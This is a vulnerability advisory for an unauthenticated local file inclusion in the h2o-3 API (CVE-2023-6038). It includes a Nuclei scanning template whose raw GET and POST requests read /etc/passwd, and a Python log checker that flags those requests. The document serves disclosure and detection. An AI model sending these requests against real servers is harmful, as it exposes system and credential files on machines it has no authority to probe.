Local File Inclusion Vulnerability
A Local File Inclusion (LFI) vulnerability was identified in the h2o-3 API version 3.40.0.4, allowing unauthenticated remote attackers to read any file on the server's filesystem. This vulnerability is present in the default installation of the software, requiring no user interaction to exploit. The issue was reported to the developers on June 8, 2023, but as of the last update, a fixed version has not been specified.
Available publicly on Nov 16 2023
Nuclei Template
id: h2o-importfiles-lfi

info:
  name: H2O ImportFiles LFI
  author: danmcinerney (Vuln Discovery), byt3bl33d3r (Nuclei Template)
  severity: high
  description: H2O is vulnerable to an local file include in it's ImportFiles API endpoint
  reference:
    - https://huntr.com/bounties/380fce33-fec5-49d9-a101-12c972125d8c/
  classification:
    cvss-score: 8.6
    cve-id: CVE-2023-6038
    cwe-id: CWE-29
  tags: h2o-3,h2o,ml,cve,protectai,huntr

http:
  - raw:
      - |
        GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /3/ParseSetup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
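Detection example (added here, not part of the advisory or the template): a log check that flags requests to the two endpoints the template uses when they name a file outside the directory H2O is expected to import from. The `ALLOWED_ROOTS` value, the helper names, the sample log lines and the availability of POST bodies in logging are assumptions.

```python
import json
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_ROOTS = ("/data/h2o",)  # assumption: the only import directory in use
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def normalise(path):
    """Collapse ../ segments so traversal cannot hide the real target."""
    return posixpath.normpath("/" + path.lstrip("/"))

def outside_allowed(path):
    norm = normalise(path)
    return not any(norm == r or norm.startswith(r + "/") for r in ALLOWED_ROOTS)

def requested_paths(method, target, body=""):
    """Yield the file paths named by an ImportFiles or ParseSetup request."""
    url = urlsplit(target)
    if url.path == "/3/ImportFiles":
        yield from parse_qs(url.query).get("path", [])
    elif url.path == "/3/ParseSetup" and method == "POST":
        for raw in parse_qs(body).get("source_frames", []):
            try:
                frames = json.loads(raw)
            except ValueError:
                continue
            if isinstance(frames, list):
                for frame in frames:
                    # Keys look like "nfs://etc/passwd"; drop the scheme.
                    yield re.sub(r"^[a-z0-9]+:/+", "/", str(frame))

def suspicious(log_line, body=""):
    """Return normalised out-of-policy paths referenced by one log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    paths = requested_paths(m["method"], m["target"], body)
    return [normalise(p) for p in paths if outside_allowed(p)]

# Constructed sample records: (access-log line, request body if captured).
SAMPLE = [
    ('203.0.113.7 - - [16/Nov/2023:10:00:00 +0000] "GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1" 200 512', ""),
    ('203.0.113.7 - - [16/Nov/2023:10:00:01 +0000] "POST /3/ParseSetup HTTP/1.1" 200 900', "source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D"),
    ('198.51.100.4 - - [16/Nov/2023:10:05:00 +0000] "GET /3/ImportFiles?path=%2Fdata%2Fh2o%2Ftrain.csv HTTP/1.1" 200 300', ""),
]

if __name__ == "__main__":
    for line, body in SAMPLE:
        print(suspicious(line, body) or "ok", "<-", line.split('"')[1])
```

Standard access logs do not record POST bodies, so the `ParseSetup` branch only fires where a proxy or WAF captures them; the `ImportFiles` branch works on the request line alone.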